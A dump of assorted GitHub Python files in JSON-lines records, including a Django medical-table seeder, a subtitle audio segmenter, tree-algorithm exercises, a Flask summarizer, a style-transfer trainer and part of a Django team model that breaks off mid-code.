i-15)\n price = sim.order(ord, i)\n met.order_update(0)\n order_list.append(ord)\n price_list.append(price)\nprint(price_list)\n'''\nplt.plot(range(0,len(price_list)),data['Close'][15:361],'b')\nplt.plot(range(0,len(price_list)),price_list,'g')\n#plt.plot(range(0,len(order_list)),order_list)\n#plt.ylim([28980,28990])\n\nplt.show()\n'''\n","repo_name":"kousik97/Order-Execution-Strategy","sub_path":"Code/gbm.py","file_name":"gbm.py","file_ext":"py","file_size_in_byte":3252,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"53"} +{"seq_id":"9588812940","text":"# -*- coding: utf-8 -*-\n\"\"\"\n File name: medic_tables\n Author: Edgar Arturo Haas Pacheco\n Date created: 14/7/2016\n Python Version: 2.7.11\n\"\"\"\nimport json\nimport os\n\nfrom django.core.management.base import BaseCommand\n\nfrom sigia.dev_settings import BASE_DIR\nfrom sigia.models import SigiaMedicPersonalBackgroundDetail, SigiaMedicFamilyBackgroundDetail, \\\n SigiaMedicPhysicalExamDetail, SigiaMedicDiagnosticPlanDetail, SigiaMedicCie10\nfrom django.contrib.auth.models import User\nfrom django.utils import timezone\n\n\nclass Command(BaseCommand):\n args = ''\n help = 'our help string comes here franklin'\n user = User.objects.get(username='ahaas')\n date = timezone.now()\n\n def _create_personal_background(self):\n lista = []\n lista_detalle = ['VACUNAS', 'ENF. PRENATAL', 'ENF. INFANCIA', 'ENF. ADOLESCENCIA', 'ENF. ALÉRGICA',\n 'ENF. CARDIACA', 'ENF. RESPIRATORIA', 'ENF. DIGESTIVA', 'ENF. NEUROLÓGICA', 'ENF. METABÓLICA',\n 'ENF. HEMO LINF.', 'ENF. URINARIA', 'ENF. TRAUMÁTICA',\n 'ENF. QUIRÚRGICA', 'ENF. MENTAL', 'ENF. TRANGM SEX', 'TENDENCIA SEXUAL', 'RIESGO SOCIAL',\n 'RIESGO LABORAL', 'RIESGO FAMILIAR', 'ACTIVIDAD FÍSICA', 'DIETA Y HÁBITOS',\n 'RELIGION Y CULTURA', 'OTRO', 'MENARQUA', 'MENOPAUSIA', 'CICLOS', 'VIDA SEXUAL ACTIVA',\n 'GESTA', 'PARTOS', 'ABORTOS', 'CESÁREAS', 'HIJOS VIVOS', 'FUM', 'FUP', 'FUC', 'BIOCOPIA',\n 'MÉTODO DE P. FAMILIAR', 'TERAPIA HORMONAL', 'COLPOS COPIA', 'MAMOGRAFÍA']\n for detalle in lista_detalle:\n lista.append(SigiaMedicFamilyBackgroundDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user,\n modified_by=self.user))\n SigiaMedicPersonalBackgroundDetail.objects.bulk_create(lista)\n\n def _create_family_background(self):\n lista = []\n lista__detalle = ['CARDIOPATÍA', 'DIABETES', 'ENF. C. VASCULAR', 'HIPERTENSIÓN', 'CANCER', 'TUBERCULOSIS',\n 'ENF. MENTAL', 'ENF. INFECCIOSA', 'MALFORMACIÓN', 'OTRO']\n for detalle in lista__detalle:\n lista.append(SigiaMedicFamilyBackgroundDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user, modified_by=self.user))\n SigiaMedicFamilyBackgroundDetail.objects.bulk_create(lista)\n\n def _create_physical_background(self):\n lista = []\n lista_detalle1 = ['PIEL Y FANERAS', 'CABEZA', 'OJOS', 'OÍDOS', 'NARIZ', 'BOCA', 'ORO FARINGE', 'CUELLO',\n 'AXILAS - MAMAS', 'TÓRAX', 'ABDOMEN', 'COLUMNA VERTEBRAL', 'INGLE PERINE',\n 'MIEMBROS SUPERIORES', 'MIEMBROS SUPERIORES', 'ÓRGANO DE LOS SENTIDOS', 'RESPIRATORIO',\n 'CARDIO VASCULAR', 'DIGESTIVO', 'GENITAL', 'URINARIO', 'MUSCULO ESQUELÉTICO', 'ENDOCRINO',\n 'HEMO LINFÁTICO', 'NEUROLÓGICO']\n for detalle in lista_detalle1:\n lista.append(SigiaMedicPhysicalExamDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user, modified_by=self.user))\n SigiaMedicPhysicalExamDetail.objects.bulk_create(lista)\n\n def _create_diagnostic_background(self):\n lista = []\n lista_detalle2 = ['BIOMETRÍA', 'UROANALISIS', 'QUÍMICA BAN..', 'ELECTROLITOS', 'GASOMETRÍA',\n 'ELECTRO CARDIOGRAMA', 'ENDOSCOPIA', 'R-X TÓRAX', 'R-X ABDOMEN', 'R-X ÓSEA', 'TOMOGRAFÍA',\n 'RESONANCIA', 'ECOGRAFÍA PÉLVICA', 'ECOGRAFÍA ABDOMEN', 'INTERCONSULTA', 'OTROS', 'NO APLICA']\n for detalle in lista_detalle2:\n lista.append(SigiaMedicDiagnosticPlanDetail(detail=detalle, created=self.date, modified=self.date,\n created_by=self.user, modified_by=self.user))\n SigiaMedicDiagnosticPlanDetail.objects.bulk_create(lista)\n\n @staticmethod\n def _create_cie10_rows():\n lista = []\n base = os.path.dirname(os.path.dirname(__file__))\n data = open(BASE_DIR + '\\sigia\\static\\data\\cie10.json').read()\n json_data = json.loads(data)\n for row in json_data:\n lista.append(SigiaMedicCie10(id=row['c'], detail=row['d']))\n SigiaMedicCie10.objects.bulk_create(lista)\n\n def handle(self, *args, **options):\n self._create_personal_background()\n self._create_family_background()\n self._create_physical_background()\n self._create_diagnostic_background()\n self._create_cie10_rows()\n","repo_name":"Oriphiel/sigia","sub_path":"sigia/management/commands/medic_tables.py","file_name":"medic_tables.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14305520847","text":"# -*- coding: utf-8 -*-\nfrom optparse import OptionParser\nimport os\nimport sys\nimport re\nimport csv\nfrom datetime import datetime, date, time, timedelta\nimport pysrt\nfrom pydub import AudioSegment\nfrom proscript.proscript import Word, Proscript, Segment\nfrom proscript.utilities import utils\n\n#CONSTANTS\nSENTENCE_END_MARKS = ['.', '?', '!', ':', '...']\n\ndef checkArgument(argname, isFile=False, isDir=False, createDir=False):\n\tif not argname:\n\t\treturn False\n\telse:\n\t\tif isFile and not os.path.isfile(argname):\n\t\t\treturn False\n\t\tif isDir:\n\t\t\tif not os.path.isdir(argname):\n\t\t\t\tif createDir:\n\t\t\t\t\tprint(\"Creating directory %s\"%(argname))\n\t\t\t\t\tos.makedirs(argname)\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\treturn True\n\ndef cutAudioWithPydub(audio_segment, start_time, end_time, outputfile):\n\textract = audio_segment[start_time*1000:end_time*1000]\n\textract.export(outputfile, format=options.audioformat)\n\ndef extract_audio_segments(proscript, audio_segment, output_dir, file_prefix=\"\"):\n\t'''\n\tCuts each segment and outputs as wav+transcript\n\t'''\n\tfor segment in proscript.segment_list:\n\t\tfileId=\"%s%04d\"%(file_prefix, segment.id)\n\n\t\tsegmentAudioFile = \"%s/%s_audio.wav\"%(output_dir, fileId)\n\t\tsubScriptFile = \"%s/%s_sub.txt\"%(output_dir, fileId)\n\n\t\tcutAudioWithPydub(audio_segment, segment.start_time, segment.end_time, segmentAudioFile)\n\n\t\t#write subtitle text to a separate file\n\t\twith open(subScriptFile, 'w') as f:\n\t\t\tf.write(segment.transcript)\n\ndef subriptime_to_seconds(srTime):\n\t'''\n\tConvert SubRipTime object to seconds\n\t'''\n\tt = datetime.combine(date.min, srTime.to_time()) - datetime.min\n\treturn t.total_seconds()\n\ndef normalize_transcript(transcript):\n\t'''\n\tAll text normalization here\n\t'''\n\ttranscript = re.sub('\\n', ' ', transcript)\n\treturn transcript\n\ndef to_proscript(srt_data):\n\tproscript = Proscript()\n\n\tsegment_count = 0\n\tfirst_utterance = True\n\n\tfor index, srt_entry in enumerate(srt_data):\n\t\tstart_time = subriptime_to_seconds(srt_entry.start)\n\t\tend_time = subriptime_to_seconds(srt_entry.end)\n\n\t\ttranscript = srt_entry.text_without_tags.strip()\n\n\t\tif options.merge_to_sentences:\n\t\t\t#merges subtitle entries to complete sentences. The srt needs to be well punctuated\n\t\t\tif transcript and not transcript.isspace():\n\t\t\t\tif first_utterance:\n\t\t\t\t\tcurr_seg = Segment()\n\t\t\t\t\tcurr_seg.start_time = start_time\n\t\t\t\t\tcurr_seg.end_time = end_time\n\t\t\t\t\tcurr_seg.transcript += transcript\n\t\t\t\t\tfirst_utterance = False\n\t\t\t\telif curr_seg.transcript[-1] in SENTENCE_END_MARKS:\n\t\t\t\t\tif curr_seg.transcript and not curr_seg.transcript.isspace():\n\t\t\t\t\t\tsegment_count += 1\n\t\t\t\t\t\tcurr_seg.id = segment_count\n\t\t\t\t\t\tcurr_seg.transcript = normalize_transcript(curr_seg.transcript)\n\t\t\t\t\t\tproscript.add_segment(curr_seg)\n\t\t\t\t\t\t# print(\"----====----\")\n\t\t\t\t\t\t# curr_seg.to_string()\n\t\t\t\t\t\t# print(\"----====----\")\n\t\t\t\t\tcurr_seg = Segment()\n\t\t\t\t\tcurr_seg.start_time = start_time\n\t\t\t\t\tcurr_seg.end_time = end_time\n\t\t\t\t\tcurr_seg.transcript += transcript\n\t\t\t\t\t#print(\"curr_seg:\\n%s\"%curr_seg.transcript)\n\t\t\t\telse:\n\t\t\t\t\tcurr_seg.end_time = subriptime_to_seconds(srt_entry.end)\n\t\t\t\t\tcurr_seg.transcript += ' ' + transcript\n\t\t\t\t\t#print(\"curr_seg:\\n%s\"%curr_seg.transcript)\n\n\t\t\tif index == len(srt_data) - 1:\n\t\t\t\tif curr_seg.transcript and not curr_seg.transcript.isspace():\n\t\t\t\t\tsegment_count += 1\n\t\t\t\t\tcurr_seg.id = segment_count\n\t\t\t\t\tcurr_seg.transcript = normalize_transcript(transcript)\n\t\t\t\t\tproscript.add_segment(curr_seg)\n\t\t\t\t\t# curr_seg.to_string()\n\t\t\t\t\t# print(\"----====----\")\n\t\telse:\n\t\t\t#each subtitle entry is a segment\n\t\t\tif transcript and not transcript.isspace():\n\t\t\t\tcurr_seg = Segment()\n\t\t\t\tcurr_seg.start_time = start_time\n\t\t\t\tcurr_seg.end_time = end_time\n\t\t\t\tcurr_seg.transcript = transcript\n\t\t\t\tsegment_count += 1\n\t\t\t\tcurr_seg.id = segment_count\n\t\t\t\tcurr_seg.transcript = normalize_transcript(curr_seg.transcript)\n\t\t\t\tproscript.add_segment(curr_seg)\n\treturn proscript\n\ndef main(options):\n\tcheckArgument(options.audiofile, isFile=True)\n\tcheckArgument(options.subfile, isFile=True)\n\tcheckArgument(options.outdir, isDir=True, createDir=True)\n\n\tprint(\"Audio: %s\\nSubtitles: %s\\nLanguage: %s\"%(options.audiofile, options.subfile, options.file_prefix))\n\tprint(\"Reading subtitles...\", end=\"\")\n\tsrtData = pysrt.open(options.subfile)\n\tprint(\"done\")\n\n\taudio = AudioSegment.from_file(options.audiofile, format=options.audioformat)\n\n\tmovie_proscript = to_proscript(srtData)\n\n\tproscript_file = \"%s/%s_proscript.csv\"%(options.outdir, options.file_prefix)\n\tmovie_proscript.segments_to_csv(proscript_file, ['id', 'start_time', 'end_time', 'transcript'], delimiter='|')\n\tprint(\"Segments info written to %s\"%proscript_file)\n\n\tprint(\"Segmenting subtitle entries...\", end=\"\")\n\textract_audio_segments(movie_proscript, audio, options.outdir, file_prefix=options.file_prefix)\n\tprint(\"done.\")\n\t\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [-s infile] [option]\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-a\", \"--audiofile\", dest=\"audiofile\", default=None, help=\"movie audio file to be segmented\", type=\"string\")\n parser.add_option(\"-s\", \"--sub\", dest=\"subfile\", default=None, help=\"subtitle file (srt)\", type=\"string\")\n parser.add_option(\"-o\", \"--output-dir\", dest=\"outdir\", default=None, help=\"Directory to output segments and sentences\", type=\"string\")\n parser.add_option(\"-l\", \"--lang\", dest=\"movielang\", default=\"\", help=\"Language of the movie audio (Three letter ISO 639-2/T code)\", type=\"string\")\n parser.add_option(\"-p\", \"--prefix\", dest=\"file_prefix\", default=\"\", help=\"Prefix for naming files\", type=\"string\")\n parser.add_option(\"-f\", \"--audioformat\", dest=\"audioformat\", default=\"wav\", help=\"Audio format (wav, mp3 etc.)\", type=\"string\")\n parser.add_option(\"-m\", \"--merge-to-sentences\", dest=\"merge_to_sentences\", action=\"store_true\", default=False, help=\"Merges subtitle entries to full sentences. (Srt needs to be well punctuated)\")\n\n (options, args) = parser.parse_args()\n\n main(options)","repo_name":"collectivat/CorpusWorks","sub_path":"subsegment.py","file_name":"subsegment.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13696243989","text":"from typing import List\n\nfrom svg.shapes import Line, Shape\nfrom svg.patterns.abstract import AbstractPattern\n\n\nclass GridPattern(AbstractPattern):\n @property\n def name(self) -> str:\n return \"grid\"\n\n @property\n def overridable(self) -> List[str]:\n return [\"stroke\"]\n\n def draw(self, count: int) -> List[Shape]:\n shapes = []\n\n parts_count = count + 1\n\n dx = self.width // parts_count\n dy = self.height // parts_count\n cc = self.palette.get_color()\n\n l = Line(dx, 0, dx, self.height)\n l.stroke = cc\n l.stroke_width = 2\n shapes.append(l)\n\n l = Line(0, dy, self.width, dy)\n l.stroke = cc\n l.stroke_width = 2\n shapes.append(l)\n\n return shapes\n\n\n__all__ = [\"GridPattern\"]\n","repo_name":"vikian050194/svg","sub_path":"svg/patterns/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10735729412","text":"# https://leetcode.com/problems/flatten-binary-tree-to-linked-list/\n#\n# Given a binary tree, flatten it to a linked list in-place.\n#\n# For example,\n# Given\n#\n# 1\n# / \\\n# 2 5\n# / \\ \\\n# 3 4 6\n# The flattened tree should look like:\n# 1\n# \\\n# 2\n# \\\n# 3\n# \\\n# 4\n# \\\n# 5\n# \\\n# 6\n#\n# Hints:\n# If you notice carefully in the flattened tree,\n# each node's right child points to the next node of a pre-order traversal.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n if root == None:\n return\n stack = []\n if root.right != None:\n stack.append(root.right)\n if root.left != None:\n stack.append(root.left)\n linkedNode = root\n while stack != []:\n node = stack.pop()\n linkedNode.left = None\n linkedNode.right = node\n if node.right != None:\n stack.append(node.right)\n if node.left != None:\n stack.append(node.left)\n linkedNode = node\n return\n","repo_name":"rainzhop/cumulus-tank","sub_path":"leetcode/medium/flatten-binary-tree-to-linked-list.py","file_name":"flatten-binary-tree-to-linked-list.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71732932327","text":"from typing import Optional\n\nfrom bst_node import BstNode\nfrom test_framework import generic_test\n\n\ndef search_bst(tree: BstNode, key: int) -> Optional[BstNode]:\n ptr = tree\n while ptr is not None and ptr.data != key:\n if key < ptr.data:\n ptr = ptr.left\n else:\n ptr = ptr.right\n\n return ptr\n\ndef search_bst_wrapper(tree, key):\n result = search_bst(tree, key)\n return result.data if result else -1\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('search_in_bst.py', 'search_in_bst.tsv',\n search_bst_wrapper))\n","repo_name":"giuscri/new-epi-judge","sub_path":"epi_judge_python/search_in_bst.py","file_name":"search_in_bst.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41864888698","text":"'''https://cs111.wellesley.edu/labs/lab01/colors'''\n\nfrom turtle import Turtle, Screen\n\ntimmy = Turtle()\nprint(timmy)\ntimmy.shape(\"turtle\")\ntimmy.color(\"DeepPink\")\ntimmy.forward(220)\n\nmy_screen = Screen()\nprint(my_screen.canvheight)\nmy_screen.exitonclick()\n\n\n\n\nclass Car():\n \"\"\"atributes\"\"\"\n speed = 0\n fuel = 32\n\n \"\"\"method1\"\"\"\n def move(self):\n self.speed = 60\n\n\n \"\"\"method2\"\"\"\n def stop(self):\n self.speed = 0\n\nvolvo = Car()\nprint(volvo.speed)\nvolvo.move()\nprint(volvo.speed)\nvolvo.stop()\nprint(volvo.speed)","repo_name":"emillo89/nauka","sub_path":"100-days-of-code/2.Intermediate/Day16/145.ConstructingObject.py","file_name":"145.ConstructingObject.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7568149974","text":"from flask import Flask,render_template,request\r\nimport pickle\r\napp=Flask(__name__)\r\nimport transformers\r\nfrom transformers import pipeline\r\nmod=pipeline(\"summarization\",model=\"facebook/bart-large-cnn\")\r\n@app.route('/')\r\ndef home():\r\n return render_template('front.html')\r\n@app.route(\"/summarize\",methods=['POST','GET'])\r\ndef predict():\r\n body=request.form['input1']\r\n result=mod(body)\r\n return render_template('summary.html',result=result)\r\nif __name__== '__main__':\r\n app.run(debug=True)","repo_name":"NEC-PROJECTS-2023/DG7","sub_path":"Code/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14803160454","text":"from numpy import load, array\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nimport os\n\n\nfolder = 'BIP_Experiment/SMC'\nload_data = lambda file_name: load(os.path.join(folder, file_name), allow_pickle=True)[()]\n# delta = 0.01\nRWM_001 = load_data('SMC_DICT_RWM_001.npy')\nTHUG_001 = load_data('SMC_DICT_THUG_001.npy')\nαTHUG_001 = load_data('SMC_DICT_ATHUG_001.npy')\n# delta = 0.1\nRWM_01 = load_data('SMC_DICT_RWM_01.npy')\nTHUG_01 = load_data('SMC_DICT_THUG_01.npy')\nαTHUG_01 = load_data('SMC_DICT_ATHUG_01.npy')\n# delta = 0.5\nRWM_05 = load_data('SMC_DICT_RWM_05.npy')\nTHUG_05 = load_data('SMC_DICT_THUG_05.npy')\nαTHUG_05 = load_data('SMC_DICT_ATHUG_05.npy')\n# delta = 1.0\nRWM_1 = load_data('SMC_DICT_RWM_1.npy')\nTHUG_1 = load_data('SMC_DICT_THUG_1.npy')\nαTHUG_1 = load_data('SMC_DICT_ATHUG_1.npy')\n\n\n\n\nif __name__ == \"__main__\":\n # Parameters\n LW = 3\n TICK_LABEL_SIZE=12\n LABEL_SIZE = 15\n TITLE_SIZE=20\n # Plot meta parameters\n n_rows = 4\n n_cols = 4\n # Storage\n D = array([\n [αTHUG_001, THUG_001, RWM_001, 0.01], \n [αTHUG_01, THUG_01, RWM_01, 0.1],\n [αTHUG_05, THUG_05, RWM_05, 0.5],\n [αTHUG_1, THUG_1, RWM_1, 1.0]])\n K = ['UNIQUE_PARTICLES', 'ALPHAS', 'ESS', 'AP']\n TITLES = [r'$\\mathregular{\\delta=0.01}$', r'$\\mathregular{\\delta=0.1}$', r'$\\mathregular{\\delta=0.5}$', r'$\\mathregular{\\delta=1.0}$']\n COLOR_THUG = '#354F60'\n COLOR_HUG = '#BC0E4C'\n COLOR_RWM = '#FFC501'\n fig, ax = plt.subplots(nrows=n_rows, ncols=n_cols, sharex=True, sharey='row', figsize=(16, 16))\n\n # Row 1 - Unique Particles\n for j in range(n_cols):\n # αTHUG\n ax[0, j].plot(D[j, 0]['EPSILON'], D[j, 0]['UNIQUE_PARTICLES'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n # THUG (α fixed)\n ax[0, j].plot(D[j, 1]['EPSILON'], D[j, 1]['UNIQUE_PARTICLES'], label=r'THUG', lw=LW, color=COLOR_HUG)\n # RWM\n ax[0, j].plot(D[j, 2]['EPSILON'], D[j, 2]['UNIQUE_PARTICLES'], label='RWM', lw=LW, color=COLOR_RWM)\n # Titles\n ax[0, j].set_title(TITLES[j], fontsize=TITLE_SIZE)\n ax[0, 0].set_ylabel(\"Unique Particles\", fontsize=LABEL_SIZE)\n\n\n # Row 2 - Alphas\n for j in range(n_cols):\n # αTHUG\n ax[1, j].plot(D[j, 0]['EPSILON'], D[j, 0]['ALPHAS'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n ax[1, 0].set_ylabel(r\"$\\mathregular{\\alpha}$\", fontsize=LABEL_SIZE)\n\n # Row 3 - ESS\n for j in range(n_cols):\n # αTHUG\n ax[2, j].plot(D[j, 0]['EPSILON'], D[j, 0]['ESS'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n # THUG (α fixed)\n ax[2, j].plot(D[j, 1]['EPSILON'], D[j, 1]['ESS'], label=r'THUG', lw=LW, color=COLOR_HUG)\n # RWM\n ax[2, j].plot(D[j, 2]['EPSILON'], D[j, 2]['ESS'], label='RWM', lw=LW, color=COLOR_RWM)\n ax[2, 0].set_ylabel('ESS', fontsize=LABEL_SIZE)\n\n # Row 4 - Acceptance Probability\n for j in range(n_cols):\n # αTHUG\n ax[3, j].plot(D[j, 0]['EPSILON'], D[j, 0]['AP'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n # THUG (α fixed)\n ax[3, j].plot(D[j, 1]['EPSILON'], D[j, 1]['AP'], label=r'THUG', lw=LW, color=COLOR_HUG)\n # RWM\n ax[3, j].plot(D[j, 2]['EPSILON'], D[j, 2]['AP'], label='RWM', lw=LW, color=COLOR_RWM)\n ax[3, 0].set_ylabel('Acceptance Probability', fontsize=LABEL_SIZE)\n\n # Prettify\n for i in range(n_rows):\n for j in range(n_cols):\n if i == n_rows-1:\n ax[i, j].set_xlabel(r\"$\\mathregular{\\epsilon}$\", fontsize=20)\n ax[i, j].set_xscale('log')\n if i not in [0, 1, 2]:\n ax[i, j].set_yscale('log')\n ax[i, j].tick_params(axis='both', which='major', labelsize=TICK_LABEL_SIZE)\n plt.legend(fontsize=12, loc='lower right')\n plt.tight_layout()\n plt.savefig('images/smc_thug_fixedstepsize.png')\n plt.show()","repo_name":"MauroCE/ApproximateManifoldSamplingPaper","sub_path":"BIP_SMC_Plots.py","file_name":"BIP_SMC_Plots.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"40429921583","text":"def choice(arr, x):\n print(\"1.Linear Search\")\n print(\"2.Binary Search\")\n\n c = int(input(\"Enter your choice: \"))\n\n if c == 1:\n linearsearch(arr, x)\n elif c == 2:\n binarysearch(arr, x)\n else:\n print(\"Wrong Choice!\")\n choice(arr, x)\n\nt = \"\"\ny = t.reverse()\n\ndef linearsearch(arr, x):\n o = 0\n for i in range(len(arr)):\n if arr[i] == x:\n print(\"{0} is Found on {1} Location\".format(x, i))\n o += 1\n if o == 0:\n print(\"{0} is not Found in the List!\".format(x))\n\n\ndef binarysearch(arr, x):\n arr.sort()\n min = 0\n max = len(arr) - 1\n mid = (min + max) // 2\n\n while arr[mid] != x:\n if x == arr[mid]:\n break\n elif x > arr[mid]:\n min = mid\n mid = (min + max) // 2\n elif x < arr[mid]:\n max = mid\n mid = (min + max) // 2\n print(\"{0} is Found at {1} Location\".format(x, arr[mid]))\n\n\nMyList = list(map(int, input(\"\\nEnter the Numbers : \").strip().split()))\n\nnum = int(input(\"Enter the Number you want to Search: \"))\n\nchoice(MyList, num)\n","repo_name":"PrerakGada/Python-Programs","sub_path":"Searching-Algs.py","file_name":"Searching-Algs.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"4614782690","text":"from network import vggnet, transform\r\nimport tensorflow as tf\r\nfrom ops import content_loss, style_loss, gram\r\nfrom utils import random_batch, random_select_style\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport scipy.misc as misc\r\n\r\n\r\ndef Train(IMG_H = 256, IMG_W = 256, IMG_C = 3, STYLE_H=512, STYLE_W=512, C_NUMS = 10, batch_size = 2, learning_rate = 0.001, content_weight = 1.0, style_weight = 5.0, path_content = \"./MSCOCO//\", path_style = \"./style_imgs//\", model_path=\"./save_para//\", vgg_path=\"./vgg_para//\"):\r\n content = tf.placeholder(tf.float32, [batch_size, IMG_H, IMG_W, IMG_C])\r\n style = tf.placeholder(tf.float32, [batch_size, STYLE_H, STYLE_W, IMG_C])\r\n y = tf.placeholder(tf.float32, [1, C_NUMS])\r\n y_ = tf.zeros([1, C_NUMS])\r\n alpha = tf.constant([1.])\r\n target = transform(content, y, y_, alpha)\r\n Phi_T = vggnet(target, vgg_path)\r\n Phi_C = vggnet(content, vgg_path)\r\n Phi_S = vggnet(style, vgg_path)\r\n Loss = content_loss(Phi_C, Phi_T) * content_weight + style_loss(Phi_S, Phi_T) * style_weight\r\n Style_loss = style_loss(Phi_S, Phi_T)\r\n Content_loss = content_loss(Phi_C, Phi_T)\r\n Opt = tf.train.AdamOptimizer(learning_rate).minimize(Loss)\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n\r\n saver = tf.train.Saver()\r\n for itr in range(40000):\r\n batch_content= random_batch(path_content, batch_size, [IMG_H, IMG_W, IMG_C])\r\n batch_style, y_labels = random_select_style(path_style, batch_size, [STYLE_H, STYLE_W, IMG_C], C_NUMS)\r\n sess.run(Opt, feed_dict={content: batch_content, style: batch_style, y: y_labels})\r\n if itr % 50 == 0:\r\n [loss, Target, CONTENT_LOSS, STYLE_LOSS] = sess.run([Loss, target, Content_loss, Style_loss], feed_dict={content: batch_content, style: batch_style, y: y_labels})\r\n save_img = np.concatenate((batch_content[0, :, :, :], misc.imresize(batch_style[0, :, :, :], [IMG_H, IMG_W]), Target[0, :, :, :]), axis=1)\r\n print(\"Iteration: %d, Loss: %e, Content_loss: %e, Style_loss: %e\"%(itr, loss, CONTENT_LOSS, STYLE_LOSS))\r\n Image.fromarray(np.uint8(save_img)).save(\"./save_imgs//\"+str(itr) + \"_\" + str(np.argmax(y_labels[0, :]))+\".jpg\")\r\n if itr % 500 == 0:\r\n saver.save(sess, model_path+\"model.ckpt\")\r\n\r\ndef Init(c_nums = 10, model_path = \"./save_para//\"):\r\n content = tf.placeholder(tf.float32, [1, None, None, 3])\r\n y1 = tf.placeholder(tf.float32, [1, c_nums])\r\n y2 = tf.placeholder(tf.float32, [1, c_nums])\r\n alpha = tf.placeholder(tf.float32)\r\n target = transform(content, y1, y2, alpha)\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n saver = tf.train.Saver()\r\n saver.restore(sess, model_path + \".\\\\model.ckpt\")\r\n return target, sess, content, y1, y2, alpha\r\n\r\ndef stylize(img_path,result_path, label1, label2, alpha, target, sess, content_ph, y1_ph, y2_ph, alpha_ph):\r\n img = np.array(Image.open(img_path))\r\n h = img.shape[0]\r\n w = img.shape[1]\r\n img = misc.imresize(img, [h//5, w//5])\r\n Y1 = np.zeros([1, 10])\r\n Y2 = np.zeros([1, 10])\r\n Y1[0, label1] = 1\r\n Y2[0, label2] = 1\r\n img = sess.run(target, feed_dict={content_ph: img[np.newaxis, :, :, :], y1_ph: Y1, y2_ph: Y2, alpha_ph: alpha})\r\n Image.fromarray(np.uint8(img[0, :, :, :])).save(result_path + \"result\"+str(alpha)+\".jpg\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Train()\r\n target, sess, content, y1, y2, alpha = Init()\r\n for alp in [0., 0.2, 0.4, 0.6, 0.8, 1.0]:\r\n stylize(\"C://Users//gmt//Desktop//content_dog.jpg\", \"./results//\", 4, 5, alp, target, sess, content, y1, y2, alpha)\r\n\r\n\r\n","repo_name":"MingtaoGuo/Chinese-Character-and-Calligraphic-Image-Processing","sub_path":"conditional_instance_norm_n_style_transfer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"66"} +{"seq_id":"9609768374","text":"from django.db import models\nfrom django.db import connection, transaction\nimport datetime\nfrom admin_site.models import ReqData\nfrom datetime import datetime as dt\nimport random as rand\n\nclass Team(models.Model):\n\n\tteamID = models.CharField(max_length=100)\n\tteamPW = models.CharField(max_length=100, default='password')\n\tyearOfGrad = models.IntegerField(default=dt.now().year)\n\tstatus = models.IntegerField(default=0)\n\trequestMade = models.IntegerField(default=0)\n\tisStaff = models.IntegerField(default=0)\n\n\tdef __str__(self):\n\t\treturn self.teamID\n\t\n\tdef isLoggedIn(self):\n\t\tif self.status == 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t\n\tdef validate(self, password):\n\t\tretStatus = 0\n\t\t# retStatus {0:Invalid, 1:Valid and Single Instance, 2:Multiple Instance}\n\t\ttry:\n\t\t\tif (password == self.teamPW) & (self.status==1):\n\t\t\t\tretStatus=2\n\t\t\telif (password == self.teamPW) & (self.status==0):\n\t\t\t\tretStatus = 1\n\t\t\t\tself.status=1\n\t\t\t\tself.save()\n\t\texcept:\n\t\t\tretStatus=0\n\t\treturn retStatus\n\n\tdef logout(self):\n\t\tself.status=0\n\t\tself.save()\n\n\tdef madeRequest(self):\n\t\tself.requestMade=1\n\t\tself.save()\n\n\tdef populate(self):\n\t\tnumEntries = Request.objects.all().count()\n\t\tfor i in range(1, numEntries+1):\n\t\t\treq=Request.objects.get(pk=i)\n\t\t\tif i<10:\n\t\t\t\ttid = '202000'+str(i)\n\t\t\telif i<100:\n\t\t\t\ttid = '20200'+str(i)\n\t\t\telse:\n\t\t\t\ttid = 